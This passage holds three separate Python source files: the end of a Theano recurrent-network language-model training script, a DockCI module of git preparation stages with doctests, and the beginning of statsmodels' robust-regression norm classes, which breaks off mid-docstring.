reset =state['reset'],
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
test_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences=True,
seq_len= state['seqlen'],
mode="test",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
if 'wiki' in state['path']:
test_data = None
return train_data, valid_data, test_data
def jobman(state, channel):
# load dataset
rng = numpy.random.RandomState(state['seed'])
# declare the dimensionalies of the input and output
if state['chunks'] == 'words':
state['n_in'] = 10000
state['n_out'] = 10000
else:
state['n_in'] = 50
state['n_out'] = 50
train_data, valid_data, test_data = get_text_data(state)
## BEGIN Tutorial
### Define Theano Input Variables
x = TT.lvector('x')
y = TT.lvector('y')
h0 = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
### Neural Implementation of the Operators: \oplus
#### Word Embedding
emb_words = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inp_nhids']),
activation=eval(state['inp_activ']),
init_fn='sample_weights_classic',
weight_noise=state['weight_noise'],
rank_n_approx = state['rank_n_approx'],
scale=state['inp_scale'],
sparsity=state['inp_sparse'],
learn_bias = True,
bias_scale=eval(state['inp_bias']),
name='emb_words')
#### Deep Transition Recurrent Layer
rec = eval(state['rec_layer'])(
rng,
eval(state['nhids']),
activation = eval(state['rec_activ']),
#activation = 'TT.nnet.sigmoid',
bias_scale = eval(state['rec_bias']),
scale=eval(state['rec_scale']),
sparsity=eval(state['rec_sparse']),
init_fn=eval(state['rec_init']),
weight_noise=state['weight_noise'],
name='rec')
#### Stiching them together
##### (1) Get the embedding of a word
x_emb = emb_words(x, no_noise_bias=state['no_noise_bias'])
##### (2) Embedding + Hidden State via DT Recurrent Layer
reset = TT.scalar('reset')
rec_layer = rec(x_emb, n_steps=x.shape[0],
init_state=h0*reset,
no_noise_bias=state['no_noise_bias'],
truncate_gradient=state['truncate_gradient'],
batch_size=1)
### Neural Implementation of the Operators: \lhd
#### Softmax Layer
output_layer = SoftmaxLayer(
rng,
eval(state['nhids'])[-1],
state['n_out'],
scale=state['out_scale'],
bias_scale=state['out_bias_scale'],
init_fn="sample_weights_classic",
weight_noise=state['weight_noise'],
sparsity=state['out_sparse'],
sum_over_time=True,
name='out')
### Few Optional Things
#### Direct shortcut from x to y
if state['shortcut_inpout']:
shortcut = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inpout_nhids']),
activations=eval(state['inpout_activ']),
init_fn='sample_weights_classic',
weight_noise = state['weight_noise'],
scale=eval(state['inpout_scale']),
sparsity=eval(state['inpout_sparse']),
learn_bias=eval(state['inpout_learn_bias']),
bias_scale=eval(state['inpout_bias']),
name='shortcut')
#### Learning rate scheduling (1/(1+n/beta))
state['clr'] = state['lr']
def update_lr(obj, cost):
stp = obj.step
if isinstance(obj.state['lr_start'], int) and stp > obj.state['lr_start']:
time = float(stp - obj.state['lr_start'])
new_lr = obj.state['clr']/(1+time/obj.state['lr_beta'])
obj.lr = new_lr
if state['lr_adapt']:
rec.add_schedule(update_lr)
### Neural Implementations of the Language Model
#### Training
if state['shortcut_inpout']:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias'],
additional_inputs=[shortcut(x)]).train(target=y,
scale=numpy.float32(1./state['seqlen']))
else:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias']).train(target=y,
scale=numpy.float32(1./state['seqlen']))
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if state['carry_h0']:
train_model.updates += [(h0, nw_h0)]
#### Validation
h0val = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
rec_layer = rec(emb_words(x, use_noise=False),
n_steps = x.shape[0],
batch_size=1,
init_state=h0val*reset,
use_noise=False)
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if not state['shortcut_inpout']:
valid_model = output_layer(rec_layer,
use_noise=False).validate(target=y, sum_over_time=True)
else:
valid_model = output_layer(rec_layer,
additional_inputs=[shortcut(x, use_noise=False)],
use_noise=False).validate(target=y, sum_over_time=True)
valid_updates = []
if state['carry_h0']:
valid_updates = [(h0val, nw_h0)]
valid_fn = theano.function([x,y, reset], valid_model.cost,
name='valid_fn', updates=valid_updates)
#### Sampling
##### single-step sampling
def sample_fn(word_tm1, h_tm1):
x_emb = emb_words(word_tm1, use_noise = False, one_step=True)
h0 = rec(x_emb, state_before=h_tm1, one_step=True, use_noise=False)[-1]
word = output_layer.get_sample(state_below=h0, temp=1.)
return word, h0
##### scan for iterating the single-step sampling multiple times
[samples, summaries], updates = scan(sample_fn,
states = [
TT.alloc(numpy.int64(0), state['sample_steps']),
TT.alloc(numpy.float32(0), 1, eval(state['nhids'])[-1])],
n_steps= state['sample_steps'],
name='sampler_scan')
##### define a Theano function
sample_fn = theano.function([], [samples],
updates=updates, profile=False, name='sample_fn')
##### Load a dictionary
dictionary = numpy.load(state['dictionary'])
if state['chunks'] == 'chars':
dictionary = dictionary['unique_chars']
else:
dictionary = dictionary['unique_words']
def hook_fn():
sample = sample_fn()[0]
print 'Sample:',
if state['chunks'] == 'chars':
print "".join(dictionary[sample])
else:
for si in sample:
print dictionary[si],
print
### Build and Train a Model
#### Define a model
model = LM_Model(
cost_layer = train_model,
weight_noise_amount=state['weight_noise_amount'],
valid_fn = valid_fn,
clean_before_noise_fn = False,
noise_fn = None,
rng = rng)
if state['reload']:
model.load(state['prefix']+'model.npz')
#### Define a trainer
##### Training algorithm (SGD)
if state['moment'] < 0:
algo = SGD(model, state, train_data)
else:
algo = SGD_m(model, state, train_data)
##### Main loop of the trainer
main = MainLoop(train_data,
valid_data,
test_data,
model,
algo,
state,
channel,
train_cost = False,
hooks = hook_fn,
validate_postprocess = eval(state['validate_postprocess']))
main.main()
## END Tutorial
if __name__=='__main__':
state = {}
# complete path to data (cluster specific)
state['seqlen'] = 100
state['path']= "/data/lisa/data/PennTreebankCorpus/pentree_char_and_word.npz"
state['dictionary']= "/data/lisa/data/PennTreebankCorpus/dictionaries.npz"
state['chunks'] = 'chars'
state['seed'] = 123
# flag .. don't need to change it. It says what to do if you get cost to
# be nan .. you could raise, though I would leave it to this
state['on_nan'] = 'warn'
# DATA
# For wikipedia validation set is extremely large. Is very time
# wasteful. This value is only used for validation set, and IMHO should
# be something like seqlen * 10000 (i.e. the validation should be only
# 10000 steps
state['reset'] = -1
# For music/ word level I think 50 is a good idea. For character this
# should be at least 100 (I think there are problems with getting state
# of the art otherwise). Note most people use 200 !
# The job stops when learning rate declines to this value. It can be
# useful, because sometimes is hopeless to wait for validation error to
# get below minerr, or for the time to expire
state['minlr'] = float(5e-7)
# Layers
# Input
# Input weights are sampled from a gaussian with std=scale; this is the
# standard way to initialize
state['rank_n_approx'] = 0
state['inp_nhids'] = '[400]'
state['inp_activ'] = '[linear]'
state['inp_bias'] = '[0.]'
state['inp_sparse']= -1 # dense
state['inp_scale'] = .1
# This is for the output weights
state['out_scale'] = .1
state['out_bias_scale'] = -.5
state['out_sparse'] = -1
# HidLayer
# Hidden units on for the internal layers of DT-RNN. Having a single
# value results in a standard RNN
state['nhids'] = '[200, 200]'
# Activation of each layer
state['rec_activ'] = '"TT.nnet.sigmoid"'
state['rec_bias'] = '.0'
state['rec_sparse'] ='20'
state['rec_scale'] = '1.'
# sample_weights - you rescale the weights such that the largest
# singular value is scale
# sample_weights_classic : just sample weights from a gaussian with std
# equal to scale
state['rec_init'] = "'sample_weights'"
state['rec_layer'] = 'RecurrentMultiLayerShortPathInpAll'
# SGD params
state['bs'] = 1 # the size of the minibatch
state['lr'] = 1. # initial learn_ing rate
state['cutoff'] = 1. # threshold for gradient rescaling
state['moment'] = 0.995 #-.1 # momentum
# Do not optimize these
state['weight_noise'] = True # white Gaussian noise in weights
state['weight_noise_amount'] = 0.075 # standard deviation
# maximal number of updates
state['loopIters'] = int(1e8)
# maximal number of minutes to wait until killing job
state['timeStop'] = 48*60 # 48 hours
# Construct linear connections from input to output. These are factored
# (like the rank_n) to deal with the possible high dimensionality of the
# input, but it is a linear projection that feeds into the softmax
state['shortcut_inpout'] = False
state['shortcut_rank'] = 200
# Main Loop
# Make this to be a decently large value. Otherwise you waste a lot of
# memory keeping track of the training error (and other things) at each
# step + the stdout becomes extremely large
state['trainFreq'] = 100
state['hookFreq'] = 5000
state['validFreq'] = 1000
state['saveFreq'] = 15 # save every 15 minutes
state['prefix'] = 'model_' # prefix of the save files
state['reload'] = False # reload
state['overwrite'] = 1
# Threhold should be 1.004 for PPL, for entropy (which is what
# everything returns, it should be much smaller. Running value is 1.0002
# We should not hyperoptimize this
state['divide_lr'] = 2.
state['cost_threshold'] = 1.0002
state['patience'] = 1
state['validate_postprocess'] = 'lambda x:10**(x/numpy.log(10))'
state['truncate_gradient'] = 80 # truncated BPTT
state['lr_adapt'] = 0 # 1/(1 + n/n0) scheduling
state['lr_beta'] = 10*1900.
state['lr_start'] = 'on_error'
state['no_noise_bias'] = True # do not use weight noise for biases
state['carry_h0'] = True # carry over h0 across updates
state['sample_steps'] = 80
# Do not change these
state['minerr'] = -1
state['shift'] = 1 # n-step forward prediction
state['cutoff_rescale_length'] = False
jobman(state, None)
|
|
""" Preparation for the main job stages """
import datetime
import glob
import json
import subprocess
from itertools import chain
import py.error # pylint:disable=import-error
import py.path # pylint:disable=import-error
import pygit2
from dockci.models.job_meta.stages import JobStageBase
from dockci.util import (git_head_ref_name,
path_contained,
write_all,
)
def origin_pair(ref_str):
"""
Ensure one ref string starts with ``'origin/'``, and one not
Examples:
>>> origin_pair('master')
('origin/master', 'master')
>>> origin_pair('origin/master')
('origin/master', 'master')
>>> origin_pair('upstream/master')
('origin/upstream/master', 'upstream/master')
>>> origin_pair('origin/upstream/master')
('origin/upstream/master', 'upstream/master')
"""
with_origin = (
ref_str if ref_str.startswith('origin/')
else 'origin/%s' % ref_str
)
without_origin = with_origin[7:]
return with_origin, without_origin
class WorkdirStage(JobStageBase):
""" Prepare the working directory """
slug = 'git_prepare'
def __init__(self, job, workdir):
super(WorkdirStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
"""
Clone and checkout the job
"""
job = self.job
handle.write("Cloning from %s\n" % job.display_repo)
repo = pygit2.clone_repository(
job.command_repo,
self.workdir.join('.git').strpath,
)
handle.write("Finding %s\n" % job.commit)
try:
git_obj = repo.revparse_single(job.commit) # noqa pylint:disable=no-member
except KeyError:
try:
git_obj = repo.revparse_single('origin/%s' % job.commit) # noqa pylint:disable=no-member
except KeyError:
handle.write("Can't find that ref anywhere!\n")
return False
ref_type_str = 'unknown ref type'
if git_obj.type == pygit2.GIT_OBJ_BLOB:
ref_type_str = 'blob'
elif git_obj.type == pygit2.GIT_OBJ_COMMIT:
remote_ref, local_ref = origin_pair(job.commit)
branch = repo.lookup_branch( # pylint:disable=no-member
remote_ref,
pygit2.GIT_BRANCH_REMOTE,
)
if branch is not None:
git_obj = branch
ref_type_str = 'branch'
if job.git_branch is None:
job.git_branch = local_ref
else:
ref_type_str = 'commit'
elif git_obj.type == pygit2.GIT_OBJ_TAG:
ref_type_str = 'tag'
if job.tag is None:
job.tag = git_obj.name
elif git_obj.type == pygit2.GIT_OBJ_TREE:
ref_type_str = 'treeish'
ref_name_str = (
getattr(git_obj, 'shorthand', None) or
getattr(git_obj, 'name', None) or
job.commit
)
while git_obj.type != pygit2.GIT_OBJ_COMMIT:
git_obj = git_obj.get_object()
oid = getattr(git_obj, 'oid', None) or getattr(git_obj, 'target')
job.commit = oid.hex
job.save()
handle.write("Checking out %s %s\n" % (ref_type_str, ref_name_str))
repo.reset( # pylint:disable=no-member
oid,
pygit2.GIT_RESET_HARD,
)
# check for, and load job config
job_config_file = self.workdir.join('dockci.yaml')
if job_config_file.check(file=True):
# pylint:disable=no-member
job.job_config.load_yaml_file(job_config_file)
return True
class GitInfoStage(JobStageBase):
""" Fill the Job with information obtained from the git repo """
slug = 'git_info'
def __init__(self, job, workdir):
super(GitInfoStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
"""
Execute git to retrieve info
"""
job = self.job
repo = pygit2.Repository(self.workdir.join('.git').strpath)
commit = repo[repo.head.target] # pylint:disable=no-member
job.git_author_name = commit.author.name
job.git_author_email = commit.author.email
job.git_committer_name = commit.committer.name
job.git_committer_email = commit.committer.email
handle.write("Author name is %s\n" % job.git_author_name)
handle.write("Author email is %s\n" % job.git_author_email)
handle.write("Committer name is %s\n" % job.git_committer_name)
handle.write("Committer email is %s\n" % job.git_committer_email)
job.resolve_job_ancestor(repo)
if job.ancestor_job:
handle.write((
"Ancestor job is %s\n" % job.ancestor_job.slug
).encode())
if job.git_branch is None:
job.git_branch = git_head_ref_name(self.workdir)
if self.job.git_branch is None:
handle.write("Branch name could not be determined\n".encode())
else:
handle.write(("Branch is %s\n" % self.job.git_branch).encode())
self.job.save()
return True
class GitChangesStage(JobStageBase):
"""
Get a list of changes from git between now and the most recently built
ancestor
"""
slug = 'git_changes'
def __init__(self, job, workdir):
super(GitChangesStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
job = self.job
if job.ancestor_job:
repo = pygit2.Repository(self.workdir.join('.git').strpath)
walker = repo.walk(repo.head.target, pygit2.GIT_SORT_TIME) # noqa pylint:disable=no-member
at_least_one = False
for commit in walker:
if commit.hex.startswith(job.ancestor_job.commit):
break
at_least_one = True
handle.write('Commit: %s\n' % commit.hex)
if len(commit.parent_ids) > 1:
handle.write('Merge: %s\n' % (
' '.join((str(i) for i in commit.parent_ids)),
))
handle.write('Author: %s <%s>\n' % (
commit.author.name,
commit.author.email,
))
commit_tz = datetime.timezone(datetime.timedelta(
minutes=commit.commit_time_offset,
))
commit_dt = datetime.datetime.fromtimestamp(
commit.commit_time, commit_tz,
)
handle.write('Date: %s\n' % commit_dt.strftime('%c %z'))
double_nl = False
for line in commit.message.split('\n'):
if len(line.strip()) == 0:
handle.write('\n')
double_nl = True
else:
handle.write(' %s\n' % line)
double_nl = line.endswith('\n')
# Ensure blank line between commits
if not double_nl:
handle.write('\n')
if not at_least_one:
handle.write('No changes')
return 0
def recursive_mtime(path, timestamp):
"""
Recursively set mtime on the given path, returning the number of
additional files or directories changed
"""
path.setmtime(timestamp)
extra = 0
if path.isdir():
for subpath in path.visit():
try:
subpath.setmtime(timestamp)
extra += 1
except py.error.ENOENT:
pass
return extra
class GitMtimeStage(JobStageBase):
"""
Change the modified time to the commit time for any files in an ADD
directive of a Dockerfile
"""
slug = 'git_mtime'
def __init__(self, job, workdir):
super(GitMtimeStage, self).__init__(job)
self.workdir = workdir
def dockerfile_globs(self, dockerfile='Dockerfile'):
""" Get all glob patterns from the Dockerfile """
dockerfile_path = self.workdir.join(dockerfile)
with dockerfile_path.open() as handle:
for line in handle:
if line[:4] == 'ADD ':
add_value = line[4:]
try:
for path in json.loads(add_value)[:-1]:
yield path
except ValueError:
add_file, _ = add_value.split(' ', 1)
yield add_file
yield dockerfile
yield '.dockerignore'
def sorted_dockerfile_globs(self, reverse=False, dockerfile='Dockerfile'):
"""
Sorted globs from the Dockerfile. Paths are sorted based on depth
"""
def keyfunc(glob_str):
""" Compare paths, ranking higher level dirs lower """
path = self.workdir.join(glob_str)
try:
if path.samefile(self.workdir):
return -1
except py.error.ENOENT:
pass
return len(path.parts())
return sorted(self.dockerfile_globs(dockerfile),
key=keyfunc,
reverse=reverse)
def timestamp_for(self, path):
""" Get the timestamp for the given path """
if path.samefile(self.workdir):
git_cmd = [
'git', 'log', '-1', '--format=format:%ct',
]
else:
git_cmd = [
'git', 'log', '-1', '--format=format:%ct', '--', path.strpath,
]
# Get the timestamp
return int(subprocess.check_output(
git_cmd,
stderr=subprocess.STDOUT,
cwd=self.workdir.strpath,
))
def path_mtime(self, handle, path):
"""
Set the mtime on the given path, writitng messages to the file handle
given as necessary
"""
# Ensure path is inside workdir
if not path_contained(self.workdir, path):
write_all(handle,
"%s not in the workdir; failing" % path.strpath)
return False
if not path.check():
return True
# Show the file, relative to workdir
relpath = self.workdir.bestrelpath(path)
write_all(handle, "%s: " % relpath)
try:
timestamp = self.timestamp_for(path)
except subprocess.CalledProcessError as ex:
# Something happened with the git command
write_all(handle, [
"Could not retrieve commit time from git. Exit "
"code %d:\n" % ex.returncode,
ex.output,
])
return False
except ValueError as ex:
# A non-int value returned
write_all(handle,
"Unexpected output from git: %s\n" % ex.args[0])
return False
# User output
mtime = datetime.datetime.fromtimestamp(timestamp)
write_all(handle, "%s... " % mtime.strftime('%Y-%m-%d %H:%M:%S'))
# Set the time!
extra = recursive_mtime(path, timestamp)
extra_txt = ("(and %d more) " % extra) if extra > 0 else ""
handle.write("{}DONE!\n".format(extra_txt).encode())
if path.samefile(self.workdir):
write_all(
handle,
"** Note: Performance benefits may be gained by adding "
"only necessary files, rather than the whole source tree "
"**\n",
)
return True
def runnable(self, handle):
""" Scrape the Dockerfile, update any ``mtime``s """
dockerfile = self.job.job_config.dockerfile
try:
globs = self.sorted_dockerfile_globs(dockerfile=dockerfile)
except py.error.ENOENT:
write_all(
handle,
"Dockerfile '%s' not found! Can not continue" % dockerfile,
)
return 1
# Join with workdir, unglob, and turn into py.path.local
all_files = chain(*(
(
py.path.local(path)
for path in glob.iglob(self.workdir.join(repo_glob).strpath)
)
for repo_glob in globs
))
success = True
for path in all_files:
success &= self.path_mtime(handle, path)
return 0 if success else 1
class TagVersionStage(JobStageBase):
""" Try and add a version to the job, based on git tag """
slug = 'git_tag'
def __init__(self, job, workdir):
super(TagVersionStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
"""
Examples:
>>> from io import StringIO
>>> from subprocess import check_call
>>> test_path = getfixture('tmpdir')
>>> test_file = test_path.join('test.txt')
>>> test_file.write('test')
>>> _ = test_path.chdir()
>>> _ = check_call(['git', 'init'])
>>> _ = check_call(['git', 'config', 'user.email', 'a@example.com'])
>>> _ = check_call(['git', 'config', 'user.name', 'Test'])
>>> _ = check_call(['git', 'add', '.'])
>>> _ = check_call(['git', 'commit', '-m', 'First'])
Identifies untagged commits:
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Untagged commit
<BLANKLINE>
Finds all annotated commits, warns when multiple, ignores light tags:
>>> _ = check_call(['git', 'tag', '-a', 'test-1', '-m', 'Test 1'])
>>> _ = check_call(['git', 'tag', '-a', 'test-2', '-m', 'Test 2'])
>>> _ = check_call(['git', 'tag', 'test-3'])
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Tag: Test 1 (test-1)
Tag: Test 2 (test-2)
WARNING: Multiple tags; using "test-1"
<BLANKLINE>
Deals with untagged commits, where tags exist elsewhere:
>>> test_file.write('other')
>>> _ = check_call(['git', 'commit', '-m', 'Second', '.'])
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Untagged commit
<BLANKLINE>
Finds only tags associated with the commit:
>>> test_file.write('more')
>>> _ = check_call(['git', 'commit', '-m', 'Third', '.'])
>>> _ = check_call('GIT_COMMITTER_DATE=2016-01-01T12:00:00 '
... 'git tag -a test-4 -m "Test 4"', shell=True)
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Tag: Test 4 (test-4)
<BLANKLINE>
Uses the tag created at the latest time:
>>> _ = check_call('GIT_COMMITTER_DATE=2016-01-01T13:00:00 '
... 'git tag -a zzz-later -m "ZZZ"', shell=True)
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Tag: Test 4 (test-4)
Tag: ZZZ (zzz-later)
WARNING: Multiple tags; using "zzz-later"
<BLANKLINE>
"""
# pygit2 fails member checks because it's CFFI
# pylint:disable=no-member
repo = pygit2.Repository(self.workdir.join('.git').strpath)
head_oid = repo.head.get_object().oid
repo_tag_refs = (
repo.lookup_reference(ref_str)
for ref_str in repo.listall_references()
if ref_str.startswith('refs/tags/')
)
repo_ref_targets = (
repo[ref.target] for ref in repo_tag_refs
)
repo_ann_tags = (
git_obj for git_obj in repo_ref_targets
if isinstance(git_obj, pygit2.Tag)
)
head_tags = (
tag for tag in repo_ann_tags
if tag.target == head_oid
)
tag_count = 0
commit_tag = None
for tag in head_tags:
tag_count += 1
if commit_tag is None:
commit_tag = tag
elif tag.tagger.time > commit_tag.tagger.time:
commit_tag = tag
handle.write("Tag: {message} ({name})\n".format(
message=tag.message.strip(),
name=tag.name,
))
handle.flush()
if tag_count == 0:
handle.write("Untagged commit\n")
elif tag_count > 1:
handle.write("WARNING: Multiple tags; using \"{name}\"\n".format(
name=commit_tag.name,
))
handle.flush()
if tag_count > 0 and self.job is not None:
self.job.tag = commit_tag.name
self.job.save()
return True
|
|
import numpy as np
#TODO: add plots to weighting functions for online docs.
class RobustNorm(object):
"""
The parent class for the norms used for robust regression.
Lays out the methods expected of the robust norms to be used
by statsmodels.RLM.
Parameters
----------
None :
Some subclasses have optional tuning constants.
References
----------
PJ Huber. 'Robust Statistics' John Wiley and Sons, Inc., New York, 1981.
DC Montgomery, EA Peck. 'Introduction to Linear Regression Analysis',
John Wiley and Sons, Inc., New York, 2001.
R Venables, B Ripley. 'Modern Applied Statistics in S'
Springer, New York, 2002.
See Also
--------
statsmodels.rlm for more information on how the estimators are used
and the inputs for the methods of RobustNorm and subclasses.
Notes
-----
Currently only M-estimators are available.
"""
def rho(self, z):
"""
The robust criterion estimator function.
Abstract method:
-2 loglike used in M-estimator
"""
raise NotImplementedError
def psi(self, z):
"""
Derivative of rho. Sometimes referred to as the influence function.
Abstract method:
psi = rho'
"""
raise NotImplementedError
def weights(self, z):
"""
Returns the value of psi(z) / z
Abstract method:
psi(z) / z
"""
raise NotImplementedError
def psi_deriv(self, z):
'''
Deriative of psi. Used to obtain robust covariance matrix.
See statsmodels.rlm for more information.
Abstract method:
psi_derive = psi'
'''
raise NotImplementedError
def __call__(self, z):
"""
Returns the value of estimator rho applied to an input
"""
return self.rho(z)
class LeastSquares(RobustNorm):
"""
Least squares rho for M-estimation and its derived functions.
See also
--------
statsmodels.robust.norms.RobustNorm for the methods.
"""
def rho(self, z):
"""
The least squares estimator rho function
Parameters
-----------
z : array
1d array
Returns
-------
rho : array
rho(z) = (1/2.)*z**2
"""
return z**2 * 0.5
def psi(self, z):
"""
The psi function for the least squares estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z
"""
return np.asarray(z)
def weights(self, z):
"""
The least squares estimator weighting function for the IRLS algorithm.
The psi function scaled by the input z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = np.ones(z.shape)
"""
z = np.asarray(z)
return np.ones(z.shape, np.float64)
def psi_deriv(self, z):
"""
The derivative of the least squares psi function.
Returns
-------
psi_deriv : array
ones(z.shape)
Notes
-----
Used to estimate the robust covariance matrix.
"""
return np.ones(z.shape, np.float64)
class HuberT(RobustNorm):
"""
Huber's T for M estimation.
Parameters
----------
t : float, optional
The tuning constant for Huber's t function. The default value is
1.345.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, t=1.345):
self.t = t
def _subset(self, z):
"""
Huber's T is defined piecewise over the range for z
"""
z = np.asarray(z)
return np.less_equal(np.fabs(z), self.t)
def rho(self, z):
"""
The robust criterion function for Huber's t.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = .5*z**2 for \|z\| <= t
rho(z) = \|z\|*t - .5*t**2 for \|z\| > t
"""
z = np.asarray(z)
test = self._subset(z)
return (test * 0.5 * z**2 +
(1 - test) * (np.fabs(z) * self.t - 0.5 * self.t**2))
def psi(self, z):
"""
The psi function for Huber's t estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z for \|z\| <= t
psi(z) = sign(z)*t for \|z\| > t
"""
z = np.asarray(z)
test = self._subset(z)
return test * z + (1 - test) * self.t * np.sign(z)
def weights(self, z):
"""
Huber's t weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = 1 for \|z\| <= t
weights(z) = t/\|z\| for \|z\| > t
"""
z = np.asarray(z)
test = self._subset(z)
absz = np.fabs(z)
absz[test] = 1.0
return test + (1 - test) * self.t / absz
def psi_deriv(self, z):
"""
The derivative of Huber's t psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
return np.less_equal(np.fabs(z), self.t)
#TODO: untested, but looks right. RamsayE not available in R or SAS?
class RamsayE(RobustNorm):
"""
Ramsay's Ea for M estimation.
Parameters
----------
a : float, optional
The tuning constant for Ramsay's Ea function. The default value is
0.3.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, a = .3):
self.a = a
def rho(self, z):
"""
The robust criterion function for Ramsay's Ea.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = a**-2 * (1 - exp(-a*\|z\|)*(1 + a*\|z\|))
"""
z = np.asarray(z)
return (1 - np.exp(-self.a * np.fabs(z)) *
(1 + self.a * np.fabs(z))) / self.a**2
def psi(self, z):
"""
The psi function for Ramsay's Ea estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z*exp(-a*\|z\|)
"""
z = np.asarray(z)
return z * np.exp(-self.a * np.fabs(z))
def weights(self, z):
"""
Ramsay's Ea weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = exp(-a*\|z\|)
"""
z = np.asarray(z)
return np.exp(-self.a * np.fabs(z))
def psi_deriv(self, z):
"""
The derivative of Ramsay's Ea psi function.
Notes
-----
Used to estimate the robust covariance matrix.
"""
return np.exp(-self.a * np.fabs(z)) + z**2*\
np.exp(-self.a*np.fabs(z))*-self.a/np.fabs(z)
class AndrewWave(RobustNorm):
"""
Andrew's wave for M estimation.
Parameters
----------
a : float, optional
The tuning constant for Andrew's Wave function. The default value is
1.339.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, a = 1.339):
self.a = a
def _subset(self, z):
"""
Andrew's wave is defined piecewise over the range of z.
"""
z = np.asarray(z)
return np.less_equal(np.fabs(z), self.a * np.pi)
def rho(self, z):
"""
The robust criterion function for Andrew's wave.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = a*(1-cos(z/a)) for \|z\| <= a*pi
rho(z) = 2*a for \|z\| > a*pi
"""
a = self.a
z = np.asarray(z)
test = self._subset(z)
return (test * a * (1 - np.cos(z / a)) +
(1 - test) * 2 * a)
def psi(self, z):
"""
The psi function for Andrew's wave
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = sin(z/a) for \|z\| <= a*pi
psi(z) = 0 for \|z\| > a*pi
"""
a = self.a
z = np.asarray(z)
test = self._subset(z)
return test * np.sin(z / a)
def weights(self, z):
"""
Andrew's wave weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = sin(z/a)/(z/a) for \|z\| <= a*pi
weights(z) = 0 for \|z\| > a*pi
"""
a = self.a
z = np.asarray(z)
test = self._subset(z)
return test * np.sin(z / a) / (z / a)
def psi_deriv(self, z):
"""
The derivative of Andrew's wave psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
test = self._subset(z)
return test*np.cos(z / self.a)/self.a
#TODO: this is untested
class TrimmedMean(RobustNorm):
"""
Trimmed mean function for M-estimation.
Parameters
----------
c : float, optional
The tuning constant for Ramsay's Ea function. The default value is
2.0.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, c=2.):
self.c = c
def _subset(self, z):
"""
Least trimmed mean is defined piecewise over the range of z.
"""
z = np.asarray(z)
return np.less_equal(np.fabs(z), self.c)
def rho(self, z):
"""
The robust criterion function for least trimmed mean.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = (1/2.)*z**2 for \|z\| <= c
rho(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
test = self._subset(z)
return test * z**2 * 0.5
def psi(self, z):
"""
The psi function for least trimmed mean
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z for \|z\| <= c
psi(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
test = self._subset(z)
return test * z
def weights(self, z):
"""
Least trimmed mean weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = 1 for \|z\| <= c
weights(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
test = self._subset(z)
return test
def psi_deriv(self, z):
"""
The derivative of least trimmed mean psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
test = self._subset(z)
return test
class Hampel(RobustNorm):
"""
Hampel function for M-estimation.
Parameters
----------
a : float, optional
b : float, optional
c : float, optional
The tuning constants for Hampel's function. The default values are
a,b,c = 2, 4, 8.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, a = 2., b = 4., c = 8.):
self.a = a
self.b = b
self.c = c
def _subset(self, z):
"""
Hampel's function is defined piecewise over the range of z
"""
z = np.fabs(np.asarray(z))
t1 = np.less_equal(z, self.a)
t2 = np.less_equal(z, self.b) * np.greater(z, self.a)
t3 = np.less_equal(z, self.c) * np.greater(z, self.b)
return t1, t2, t3
def rho(self, z):
"""
The robust criterion function for Hampel's estimator
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = (1/2.)*z**2 for \|z\| <= a
rho(z) = a*\|z\| - 1/2.*a**2 for a < \|z\| <= b
